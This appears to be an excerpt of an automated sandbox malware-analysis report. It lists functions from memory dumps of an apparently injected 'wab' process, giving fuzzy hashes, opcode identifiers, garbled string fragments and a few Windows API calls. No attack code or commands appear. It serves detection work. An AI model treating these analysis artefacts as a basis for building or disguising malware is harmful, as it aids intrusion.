Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: (o]q$4']q
API String ID: 0-176817397
Opcode ID: 118a96c557b8932db2129934f807c7b6ffa32f6081c30f3c8ec3b83fd233ce69
Instruction ID: 2e86cdec22da3a351f837119798e8ad01c7df2d5651fe7d6720fd6871e95826f
Opcode Fuzzy Hash: 118a96c557b8932db2129934f807c7b6ffa32f6081c30f3c8ec3b83fd233ce69
Instruction Fuzzy Hash: F6829D79A00209DFCB1ACFA8C984AEEBBF2BF49304F158559E409DB361D730E955CB61

Function 244997B0 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd5c6bf1eb2b94c5a7894aae5e2608fdf0d7be7f53ffc9da9dc006b474e353c0
Instruction ID: 4339dca6754e51e77658ad11079f5adc18cccc42ff1d94da647dc088ea58bb26
Opcode Fuzzy Hash: dd5c6bf1eb2b94c5a7894aae5e2608fdf0d7be7f53ffc9da9dc006b474e353c0
Instruction Fuzzy Hash: 54F1D2B4E01218CFDB14DFA9C884B9DBBF2BF88304F5481A9E818AB355DB749985CF51

Function 24492970 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dd46fcc33ad40c831b2019ed0d85f67d649053eb7045cd026d8a5765da64926
Instruction ID: bb0d8b04d50edeb2570c29740133ecec4cd194da371da3cd15bae2aabc523803
Opcode Fuzzy Hash: 0dd46fcc33ad40c831b2019ed0d85f67d649053eb7045cd026d8a5765da64926
Instruction Fuzzy Hash: 45C1A378E01218CFDB54DFA5C944B9DBBB2FF88300F2085A9D809AB365DB359A85CF51

Function 028BF804 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1480987e59ea272fd6fab5eb288ad4134dd1769b2fdd00e7e9aba8f54541df1c
Instruction ID: d306714d3debc6dfdc8f21dd9234cf68190a6b2ccd3d22279c8a2846e613822d
Opcode Fuzzy Hash: 1480987e59ea272fd6fab5eb288ad4134dd1769b2fdd00e7e9aba8f54541df1c
Instruction Fuzzy Hash: DFC1C678E01218CFDB15DFA5C954B9DBBB2BF88304F2080A9D809AB365DB345E85CF51

Function 24492DD0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4162818022c5da88ff8c1baf24bce1d9dafcde1e8562dcd1e16217f010fc7a60
Instruction ID: 17e270761163c3ac8be183118239527404680465079a9d6424bfddaa27895bbb
Opcode Fuzzy Hash: 4162818022c5da88ff8c1baf24bce1d9dafcde1e8562dcd1e16217f010fc7a60
Instruction Fuzzy Hash: D8A1E274D002088FDB14DFA9C984BDDBBB1FF89314F208269E518AB3A6DB749985CF51

Function 24492288 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d172091c0faff851cd0d67f73c82bcc48afbbfe1840c15fb7bc27450702e792
Instruction ID: d87c2e2097a894f8c02d2faec1bbb5c07f52699bc82559a98cbd967913ff6a89
Opcode Fuzzy Hash: 5d172091c0faff851cd0d67f73c82bcc48afbbfe1840c15fb7bc27450702e792
Instruction Fuzzy Hash: 42A19075E012298FEB64CF6AC944B9DBBF2BF89300F14C5A9D808AB254DB745A85CF11

Function 24492DC7 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698dfd5dda3a8487e4ba9895f9238d5c58285db4afac5c5a6a0455421c87ffec
Instruction ID: 659e8286079b50bd912a4b51265c7073e914ca3603851e0518e43b85e5369483
Opcode Fuzzy Hash: 698dfd5dda3a8487e4ba9895f9238d5c58285db4afac5c5a6a0455421c87ffec
Instruction Fuzzy Hash: FAA1E374D002088FDB14DFA9C984BDDBBB1FF89304F208669E508AB3A5DB749985CF51

Function 24491BA8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c50ccf27936624e94b9a8ef8236bd472df490d133af06149e9af1db4966075a4
Instruction ID: 1aaef91001387e855863180958bc42ba841709fbeac670f385d3a4d0ddbe409b
Opcode Fuzzy Hash: c50ccf27936624e94b9a8ef8236bd472df490d133af06149e9af1db4966075a4
Instruction Fuzzy Hash: AEA182B5E012298FEB68CF6AC944B9DFBF2BF88300F14C1A9D508A7254DB745A85CF51

Function 24493116 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c4fcadad5c3d6b50e871aac95f5cd656f0fda4b170271fe63f102401b88569
Instruction ID: 27703f29a2016eaea510a6abb1cf7d6bbf6085bd6946ffe230ce46b191fa90c4
Opcode Fuzzy Hash: 05c4fcadad5c3d6b50e871aac95f5cd656f0fda4b170271fe63f102401b88569
Instruction Fuzzy Hash: 1B91E374900208CFDB10DFA8C888BDDBBF1FF49315F2096A9E509AB2A1DB759985CF51

Function 24491B97 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55e5e79d11a8552f8bcbccf3dab26a2e82c6be11766e2047521e4b24b97f2bb0
Instruction ID: 8fa7c9728116b14c894aef6b8fa594799976562de093215fd1f7b4a3ddaf53bb
Opcode Fuzzy Hash: 55e5e79d11a8552f8bcbccf3dab26a2e82c6be11766e2047521e4b24b97f2bb0
Instruction Fuzzy Hash: 9F8195B5E016198FEB68CF6AC954B9EBBF2BF88300F14C1E9D408A7254DB745A85CF11

Function 028BF12B Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a54db73194466f13499b067a18f35dd41e3822ef8359c154106e411ee990fe8
Instruction ID: e771486de79b99bb0a6d18f9bb51251c9a0db7592a973440f9cc0f4e3839a53b
Opcode Fuzzy Hash: 4a54db73194466f13499b067a18f35dd41e3822ef8359c154106e411ee990fe8
Instruction Fuzzy Hash: 1B51563CD01208CBDB06DFA8C8847EDBBB2BF89304F648529E414AB799D7759985CF91

Function 028BEC0B Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec8d081c4568a503bdc1e8aab9a1d5a02a1137ed6a32bf781085a7189ba93a37
Instruction ID: aa3c15f832aa3b98c05f3f19d1cff1fe0bd7646148c59ff40aaa25205f071f96
Opcode Fuzzy Hash: ec8d081c4568a503bdc1e8aab9a1d5a02a1137ed6a32bf781085a7189ba93a37
Instruction Fuzzy Hash: A8510878E00208DFDB09CFAAD544ADDFBB2EF88300F248029E819AB365DB756845CF55

Function 028BEC18 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19e2fd1f1822415e0eb31f0303374b600b81c2ad29388ecf6bb5dfabd58879df
Instruction ID: 3876fbbb87df162fe2a90323c490590dd965e85e3161a8d5aa0177cdcc939594
Opcode Fuzzy Hash: 19e2fd1f1822415e0eb31f0303374b600b81c2ad29388ecf6bb5dfabd58879df
Instruction Fuzzy Hash: 2851D678E00208DFDB09DFAAD584A9DBBF6FF88300F248429E819AB365DB345845CF55

Function 028BF33C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea4afc887beb2e7f4ffa86504370310b806445b6bfd65c141713de2445f87fe2
Instruction ID: 312baa132cf32de62050270c6743edcf0e3c073f57d2cd2813a9c80916e2316a
Opcode Fuzzy Hash: ea4afc887beb2e7f4ffa86504370310b806445b6bfd65c141713de2445f87fe2
Instruction Fuzzy Hash: 5351333CD01208CBCB16DFA8C884BEDBBB2BF48304F649529E514AB798D7799881CF51

Function 24492278 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67ec2a74a8a0b4a2b783078d47bb3449d3e7ca89f9685efcc36ea0d7775062f4
Instruction ID: 625d086b2ed980859bec12667caec452a5f831c88307c7eecfa6d037b8b0542c
Opcode Fuzzy Hash: 67ec2a74a8a0b4a2b783078d47bb3449d3e7ca89f9685efcc36ea0d7775062f4
Instruction Fuzzy Hash: 21416A71E016188BEB68CF6BC94479EFAF3BFC9304F14C5A9C50CA6264DB750A858F51

Function 24492963 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad1076a90cda7c825aa3cb59dd0ac04406a819b1a3301f8f32c1ad53821d8b3e
Instruction ID: 20fa819ace6813e620536aaa6fc0a681c13e616a634183581e31a6458f46b1dc
Opcode Fuzzy Hash: ad1076a90cda7c825aa3cb59dd0ac04406a819b1a3301f8f32c1ad53821d8b3e
Instruction Fuzzy Hash: 2541E475E01208CBEF14DFAAC54469DBBF2BF89300F24C12AD818AB265DB385945CF45

Function 028B0C8F Relevance: 24.3, Strings: 19, Instructions: 562
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4!h!X!h!, xrefs: 028B0FA6
\ve!, xrefs: 028B0E57
\ve!, xrefs: 028B0CC7
\ve!, xrefs: 028B0E2F
\ve!, xrefs: 028B0E7F
P(h!, xrefs: 028B1799
\ve!, xrefs: 028B0DDF
\ve!, xrefs: 028B0D8F
LR]q, xrefs: 028B0F19
\ve!, xrefs: 028B0D17
\ve!, xrefs: 028B0DB7
\ve!, xrefs: 028B0E07
\ve!, xrefs: 028B0EA7
\ve!, xrefs: 028B0CEF
\ve!, xrefs: 028B0D3F
\ve!, xrefs: 028B0ECF
\ve!, xrefs: 028B0D67
P h!, xrefs: 028B0F62
X&h!, xrefs: 028B158C

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 4!h!X!h!$LR]q$P h!$P(h!$X&h!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!
API String ID: 0-1390162697
Opcode ID: 3eb45b262c2694a446cc2f89e54bacd67ebc0e7cdec13a5b85dc9aaa05450b3c
Instruction ID: eec682acfd376e2b64a1f279d613160163af32513240f2ffc5d72697f48a824e
Opcode Fuzzy Hash: 3eb45b262c2694a446cc2f89e54bacd67ebc0e7cdec13a5b85dc9aaa05450b3c
Instruction Fuzzy Hash: FA623C78980219DFCB54DF28DD94AADBBB2FF48300F2089A5D809AB359DB345D99CF41

Function 028B0CA0 Relevance: 24.3, Strings: 19, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4!h!X!h!, xrefs: 028B0FA6
\ve!, xrefs: 028B0E57
\ve!, xrefs: 028B0CC7
\ve!, xrefs: 028B0E2F
\ve!, xrefs: 028B0E7F
P(h!, xrefs: 028B1799
\ve!, xrefs: 028B0DDF
\ve!, xrefs: 028B0D8F
LR]q, xrefs: 028B0F19
\ve!, xrefs: 028B0D17
\ve!, xrefs: 028B0DB7
\ve!, xrefs: 028B0E07
\ve!, xrefs: 028B0EA7
\ve!, xrefs: 028B0CEF
\ve!, xrefs: 028B0D3F
\ve!, xrefs: 028B0ECF
\ve!, xrefs: 028B0D67
P h!, xrefs: 028B0F62
X&h!, xrefs: 028B158C

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 4!h!X!h!$LR]q$P h!$P(h!$X&h!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!
API String ID: 0-1390162697
Opcode ID: 0f855bf3bd2fa66288729b8f0042f43377506798f383214b50ee8bfc1dea3fa3
Instruction ID: 95f5c55b9e3faf3a2101a6358731dbddccd20ffcb0bcfdfbe277004ff829044c
Opcode Fuzzy Hash: 0f855bf3bd2fa66288729b8f0042f43377506798f383214b50ee8bfc1dea3fa3
Instruction Fuzzy Hash: 1F522C78980219DFCB54DF28DD94AADBBB2FF48300F2089A5D809AB359DB345D99CF41

Function 028B76F1 Relevance: 10.5, Strings: 8, Instructions: 487
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 028B772E
(o]q, xrefs: 028B77E9
(o]q, xrefs: 028B7BFF
(o]q, xrefs: 028B7C0F
(o]q, xrefs: 028B78B2
,aq, xrefs: 028B7B90
,aq, xrefs: 028B7BA0
(o]q, xrefs: 028B7815

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-1435242062
Opcode ID: 92a2c30bbb0c2d96a3eeaee4f7f6fdada53529eb7cdb04f5c66e418663c3c3bc
Instruction ID: 194a1b964a68ca17f6384c486963ea02ae78ec2455fb112383525fac6953fcd3
Opcode Fuzzy Hash: 92a2c30bbb0c2d96a3eeaee4f7f6fdada53529eb7cdb04f5c66e418663c3c3bc
Instruction Fuzzy Hash: 7D126839A006098FCB16CF68D984AEEBBF2EF89314F158599E459DB3A1D730ED41CB50

Function 24494258 Relevance: 6.6, Strings: 5, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 244944A1
8bq, xrefs: 24494699
Haq, xrefs: 24494442
Haq, xrefs: 244942A6
TJbq, xrefs: 244946D2

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID: 8bq$Haq$Haq$Haq$TJbq
API String ID: 0-1597716666
Opcode ID: ceed617cfc7323df5f40f8db516da6c0575ab6f969e70e12d9865a78dc6c8328
Instruction ID: 2ed1bcf561e493b769ba75611e21dafc6421c325d06d2708cfa55819d4e76755
Opcode Fuzzy Hash: ceed617cfc7323df5f40f8db516da6c0575ab6f969e70e12d9865a78dc6c8328
Instruction Fuzzy Hash: 3ED1C234B082048FCB15DB68C890A9E7FF6FF89320F5441A5D505DB3A5CA35DD46CB92

Function 05BD70E4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05BD7202

Strings

9u5, xrefs: 05BD713E
9u5, xrefs: 05BD711E

Memory Dump Source

Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd

Similarity

API ID: CreateWindow
String ID: 9u5$9u5
API String ID: 716092398-1842006184
Opcode ID: ed50fdc321702ed74af1937093d4083802391a8774df9f6ebdd67a30eaf8b433
Instruction ID: 540fd53ba3889644d821843e9619c010c6cf93ffc180278a542b0501270f7af9
Opcode Fuzzy Hash: ed50fdc321702ed74af1937093d4083802391a8774df9f6ebdd67a30eaf8b433
Instruction Fuzzy Hash: 2B51B0B1D003499FDB14CF9AC884ADEFBB5FF49314F24816AE819AB210D774A945CF90

Function 05BD4F4C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05BD7202

Strings

9u5, xrefs: 05BD713E
9u5, xrefs: 05BD711E

Memory Dump Source

Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd

Similarity

API ID: CreateWindow
String ID: 9u5$9u5
API String ID: 716092398-1842006184
Opcode ID: dc1471c86fdb0def1c0000b958d3c430238a7d0420af3d0a062497eac96a4b5c
Instruction ID: 66fc9d1ed41cd918a51e7aa800cd4eff543154c5e3071871ef54ff4271b19eff
Opcode Fuzzy Hash: dc1471c86fdb0def1c0000b958d3c430238a7d0420af3d0a062497eac96a4b5c
Instruction Fuzzy Hash: 2051AFB1D003499FDB14CF9AC884ADEFBB5FF49314F64816AE819AB250DB74A845CF90

Function 24493CD0 Relevance: 5.3, Strings: 4, Instructions: 321COMMON

Download Yara Rule

Strings

, xrefs: 24493DBD
Haq, xrefs: 24493F91
Haq, xrefs: 24493F2B
Haq, xrefs: 24493F5E

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID: $Haq$Haq$Haq
API String ID: 0-432640594
Opcode ID: 865aab8f7c3a767ce9449e63d0f443a51bd8245932ee34172cc2a9d0df7ebd63
Instruction ID: d452812be08150b1eddca4685755cf8e893e7e424b159618c228b2847f6b4764
Opcode Fuzzy Hash: 865aab8f7c3a767ce9449e63d0f443a51bd8245932ee34172cc2a9d0df7ebd63
Instruction Fuzzy Hash: 9DB1AE347042049FDF15AF3888585AE3FE6EF8A324F214669E916CB3D1CE798D41DB92

Function 24493CC0 Relevance: 5.2, Strings: 4, Instructions: 244COMMON

Download Yara Rule

Strings

, xrefs: 24493D6D
Haq, xrefs: 24493F91
Haq, xrefs: 24493F2B
Haq, xrefs: 24493F5E

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID: $Haq$Haq$Haq
API String ID: 0-432640594
Opcode ID: 7fe41ac026f10b8b2eefd887ae7adbff5a44b72423c53d8f20539767a69ee5df
Instruction ID: 0c10530870d3d33ae3ddf7e229342e3c5f4085117719a9a11e97af2220cdda4e
Opcode Fuzzy Hash: 7fe41ac026f10b8b2eefd887ae7adbff5a44b72423c53d8f20539767a69ee5df
Instruction Fuzzy Hash: 5E81BE34B042049FDF15AF78C8585AE3FA6FF9A324B1141AAE516CB3D1CE398D01DB92

Function 028B8490 Relevance: 4.5, Strings: 3, Instructions: 709COMMON

Download Yara Rule

Strings

`Bm!xIm!PNm!, xrefs: 028B8EBF
$]q, xrefs: 028B8FB4
$]q, xrefs: 028B8FD7

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: `Bm!xIm!PNm!$$]q$$]q
API String ID: 0-2513829293
Opcode ID: 707ed938de1bc9044d8666d582adb78b185c1b78b52c9a51284dc49e10ea98b3
Instruction ID: 4b901f977f0ee4a669fa640ae7ad5bbf9d50ead01c51b4a280dbf8a754094b18
Opcode Fuzzy Hash: 707ed938de1bc9044d8666d582adb78b185c1b78b52c9a51284dc49e10ea98b3
Instruction Fuzzy Hash: 60524478A0021C9FEB559BA8C850B9EBB7BFF84300F1080ADC54AAB365DB359D45DF52

Function 05BD4AF8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 05BD4D5E

Strings

9u5, xrefs: 05BD4D17

Memory Dump Source

Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd

Similarity

API ID: HandleModule
String ID: 9u5
API String ID: 4139908857-632338590
Opcode ID: 8db01c215dde83a9a57ec7a5885ac361a0bb9acdcc286974aba7c5b0aa70892e
Instruction ID: b98820371365f412a69e49473c0ec4a0724d7556c769bf848e6068a596e298ea
Opcode Fuzzy Hash: 8db01c215dde83a9a57ec7a5885ac361a0bb9acdcc286974aba7c5b0aa70892e
Instruction Fuzzy Hash: 7A8145B0A00B058FDB24DF29D14576ABBF6FF88304F008969D48AD7A50EB75F805CBA1

Function 05BD509C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05BD9771

Strings

9u5, xrefs: 05BD96C7

Memory Dump Source

Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd

Similarity

API ID: CallProcWindow
String ID: 9u5
API String ID: 2714655100-632338590
Opcode ID: 978b74b4c1306dd2837fcf5654ab9b0653b335d00ed9b34c61c81c21071d0ef8
Instruction ID: 027e31c80a056802ab85a45deb4f6057566daa38c12cad9a2c8ee16cb9b1428c
Opcode Fuzzy Hash: 978b74b4c1306dd2837fcf5654ab9b0653b335d00ed9b34c61c81c21071d0ef8
Instruction Fuzzy Hash: D2411EB5A00209CFCB54DF99C488AAAFBF5FF89314F24C499D519A7321D375A845CFA0

Function 05BD3B18 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05BD4DD9,00000800,00000000,00000000), ref: 05BD53CA

Strings

9u5, xrefs: 05BD537F

Memory Dump Source

Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd

Similarity

API ID: LibraryLoad
String ID: 9u5
API String ID: 1029625771-632338590
Opcode ID: 8cc4f09dbe51442e1bcbc2d652a8658abc61489a53654e9aec37dbdbfd2ccc2a
Instruction ID: e26c237bb236b4a5a0a2808e81ff2d746478ab1abed5df7ed9135c5cefdd412f
Opcode Fuzzy Hash: 8cc4f09dbe51442e1bcbc2d652a8658abc61489a53654e9aec37dbdbfd2ccc2a
Instruction Fuzzy Hash: 861117B69043098FCB20CF9AD444A9EFBF4FB89320F10845ED91AA7250D3B5A545CFA5

Function 05BD5358 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05BD4DD9,00000800,00000000,00000000), ref: 05BD53CA

Strings

9u5, xrefs: 05BD537F

Memory Dump Source

Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd

Similarity

API ID: LibraryLoad
String ID: 9u5
API String ID: 1029625771-632338590
Opcode ID: be765210c1438db68670b9474f7101e33c33384500e4c405087eefd03599bdce
Instruction ID: c1a2ab9191020857219e929c8841789e47ac4ed9e08746c2dc4cbbb5d1f2f3d7
Opcode Fuzzy Hash: be765210c1438db68670b9474f7101e33c33384500e4c405087eefd03599bdce
Instruction Fuzzy Hash: A71129B69003498FCB10CFAAD444ADEFBF4EF88310F14846ED919A7240C375A545CFA5

Function 05BD4CF8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 05BD4D5E

Strings

9u5, xrefs: 05BD4D17

Memory Dump Source

Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd

Similarity

API ID: HandleModule
String ID: 9u5
API String ID: 4139908857-632338590
Opcode ID: 6bee39b5cc6c0ebb8e7063d4817637319e1f44b8f32e54531cf994329fe0f4d6
Instruction ID: e31193c94a4ef0111b805f61ced5fcf8317d6cc0e2cffa8e0cd3f381251953f6
Opcode Fuzzy Hash: 6bee39b5cc6c0ebb8e7063d4817637319e1f44b8f32e54531cf994329fe0f4d6
Instruction Fuzzy Hash: 4C11F2B6C006498FCB10CF9AD444ADEFBF4EF89314F10845AD829B7210D3B9A945CFA1

Function 05BDAE20 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05BDBD7D

Strings

9u5, xrefs: 05BDBD42

Memory Dump Source

Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd

Similarity

API ID: Initialize
String ID: 9u5
API String ID: 2538663250-632338590
Opcode ID: eccf0ee8adb88ad938f578e34e7da011fb96b754c2abe46b20be1231cc861e70
Instruction ID: 039d639f4363bd53f2216a640784b3f05e9c48b989553ce00c0ff9a366fe48da
Opcode Fuzzy Hash: eccf0ee8adb88ad938f578e34e7da011fb96b754c2abe46b20be1231cc861e70
Instruction Fuzzy Hash: D71100B59047488FCB20DF9AD549B9EFBF4EF48324F20845AE519A7210D378A944CFA5

Function 05BDBD21 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05BDBD7D

Strings

9u5, xrefs: 05BDBD42

Memory Dump Source

Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd

Similarity

API ID: Initialize
String ID: 9u5
